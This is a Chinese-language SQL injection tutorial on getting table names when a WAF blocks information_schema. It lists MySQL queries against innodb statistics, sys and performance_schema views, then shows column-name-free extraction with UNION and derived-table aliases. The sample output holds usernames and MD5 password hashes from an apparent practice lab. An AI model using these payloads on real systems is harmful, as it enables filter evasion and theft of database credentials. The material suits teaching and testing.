SQL注入限制条件下获取表名&无列名注入¶
获取表名¶
innodb存储引擎¶
MySQL 5.6 及以上（mysql.innodb_table_stats 与 mysql.innodb_index_stats 这两张持久化统计表自 5.6 起才存在）
当 WAF 拦截了 information_schema 时，可以利用 mysql 库中的 innodb_table_stats 和 innodb_index_stats 两张表查询到表名。但要注意：这两张表位于 mysql 库，需要当前连接账号对 mysql 库有 SELECT 权限（通常只有 root/DBA 账号具备），普通业务账号往往无法读取；并且只有 InnoDB 表的统计信息会被记录，MyISAM 等其他引擎的表不会出现（InnoDB 自 MySQL 5.5 起已是默认存储引擎，"mysql 默认关闭 InnoDB"的说法并不准确）。
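-- Table names of the current schema from the InnoDB persistent statistics tables
-- (mysql.innodb_table_stats / mysql.innodb_index_stats, present since MySQL 5.6).
-- Both live in the `mysql` schema, so the injected account needs SELECT on it;
-- only InnoDB tables are recorded there.
select table_name from mysql.innodb_table_stats where database_name = database();
-- innodb_index_stats holds several rows per index (one per stat_name), so the
-- same table_name repeats; DISTINCT collapses them to one row per table.
select distinct table_name from mysql.innodb_index_stats where database_name = database();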
sys¶
MySQL 5.7（sys 库自 5.7.7 起随服务器内置，原文写 5.7.9）的 sys 库提供了一些视图，可以从中获取表名。需要注意：读取 sys 与 performance_schema 中的视图同样需要对应库的 SELECT 权限，且 performance_schema 必须处于开启状态；其中多数统计视图只记录自服务器启动以来被访问过的表，从未被访问过的表可能不会出现。
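-- NOTE: `//` is not a comment in MySQL; use `-- ` (with a trailing space) or `#`.
-- View names below contain the substring "in" (unusable if the WAF blocks "in").
SELECT object_name FROM `sys`.`x$innodb_buffer_stats_by_table` where object_schema = database();
SELECT object_name FROM `sys`.`innodb_buffer_stats_by_table` WHERE object_schema = DATABASE();
-- one row per index, so DISTINCT is needed to get one row per table
SELECT DISTINCT TABLE_NAME FROM `sys`.`x$schema_index_statistics` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`schema_auto_increment_columns` WHERE TABLE_SCHEMA = DATABASE();
-- View names below do not contain the substring "in".
-- one row per index, so DISTINCT is needed to get one row per table
SELECT DISTINCT TABLE_NAME FROM `sys`.`x$schema_flattened_keys` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$ps_schema_table_statistics_io` WHERE TABLE_SCHEMA = DATABASE();
SELECT TABLE_NAME FROM `sys`.`x$schema_table_statistics_with_buffer` WHERE TABLE_SCHEMA = DATABASE();
-- Table names recovered from data-file paths (e.g. .../<db>/<table>.ibd). The table
-- name has to be parsed out of the path, and a table only has its own file when
-- InnoDB file-per-table is in effect — TODO confirm on the target.
-- DATABASE() is used as a regular expression here: a schema name containing regex
-- metacharacters (e.g. '.') may over-match; acceptable for enumeration, but verify.
SELECT FILE FROM `sys`.`io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`io_global_by_file_by_latency` WHERE FILE REGEXP DATABASE();
SELECT FILE FROM `sys`.`x$io_global_by_file_by_bytes` WHERE FILE REGEXP DATABASE();
-- Normalised text of statements already executed on the server (all accounts);
-- table names appear inside the returned query text rather than as a column.
SELECT QUERY FROM sys.x$statement_analysis WHERE QUERY REGEXP DATABASE();
SELECT QUERY FROM `sys`.`statement_analysis` where QUERY REGEXP DATABASE();
-- performance_schema must be enabled and the account needs SELECT on it. These
-- summary tables fill in as tables are touched, so a table not accessed since
-- server start may be absent.
SELECT object_name FROM `performance_schema`.`objects_summary_global_by_type` WHERE object_schema = DATABASE();
-- one row per open handle / per index, so DISTINCT is needed to get one row per table
SELECT DISTINCT object_name FROM `performance_schema`.`table_handles` WHERE object_schema = DATABASE();
SELECT DISTINCT object_name FROM `performance_schema`.`table_io_waits_summary_by_index_usage` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_io_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT object_name FROM `performance_schema`.`table_lock_waits_summary_by_table` WHERE object_schema = DATABASE();
SELECT digest_text FROM `performance_schema`.`events_statements_summary_by_digest` WHERE digest_text REGEXP DATABASE();
SELECT file_name FROM `performance_schema`.`file_instances` WHERE file_name REGEXP DATABASE();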
无列名注入¶
利用join进行无列名注入（注：本节示例实际使用的是 union + 派生表别名的方式，并未用到 join）¶
-- Placeholder row 1,2,3,4 fixes the column count (users has four columns, as the
-- result below shows); the UNION appends every users row beneath it, so the first
-- result row is the placeholder itself.
SELECT 1, 2, 3, 4 UNION SELECT * FROM users;
1 | 2 | 3 | 4 |
---|---|---|---|
1 | 2 | 3 | 4 |
1 | admin | e10adc3949ba59abbe56e057f20f883e | 1 |
2 | pikachu | 670b14728ad9902aecba32e22fa4f6bd | 2 |
3 | test | e99a18c428cb38d5f260853678922e03 | 3 |
-- In a derived table the column names come from the first SELECT of the UNION,
-- so the third column is literally named "3". It must be backtick-quoted: a bare
-- 3 would be an integer literal, not a column reference.
SELECT `3` FROM (SELECT 1, 2, 3, 4 UNION SELECT * FROM users) AS a;
3 |
---|
3 |
e10adc3949ba59abbe56e057f20f883e |
670b14728ad9902aecba32e22fa4f6bd |
e99a18c428cb38d5f260853678922e03 |
如果反引号 ` 被过滤，可以使用列别名来代替：
-- Same trick without backticks: alias the placeholder columns (2 AS b, 4 AS c).
-- The alias from the first SELECT becomes the derived-table column name, so `b`
-- now addresses the second column of every users row.
SELECT b FROM (SELECT 1, 2 AS b, 3, 4 AS c UNION SELECT * FROM users) AS a;
b |
---|
2 |
admin |
pikachu |
test |
同时取出多个列（用 concat 拼接，一次带出多列）：
-- Pull two columns at once: 0x2d is the hex form of '-', used as the separator
-- so the payload needs no quote characters.
SELECT concat(b,0x2d,c) FROM (SELECT 1, 2 AS b, 3 AS c, 4 UNION SELECT * FROM users) AS a;
concat(b,0x2d,c) |
---|
2-3 |
admin-e10adc3949ba59abbe56e057f20f883e |
pikachu-670b14728ad9902aecba32e22fa4f6bd |
test-e99a18c428cb38d5f260853678922e03 |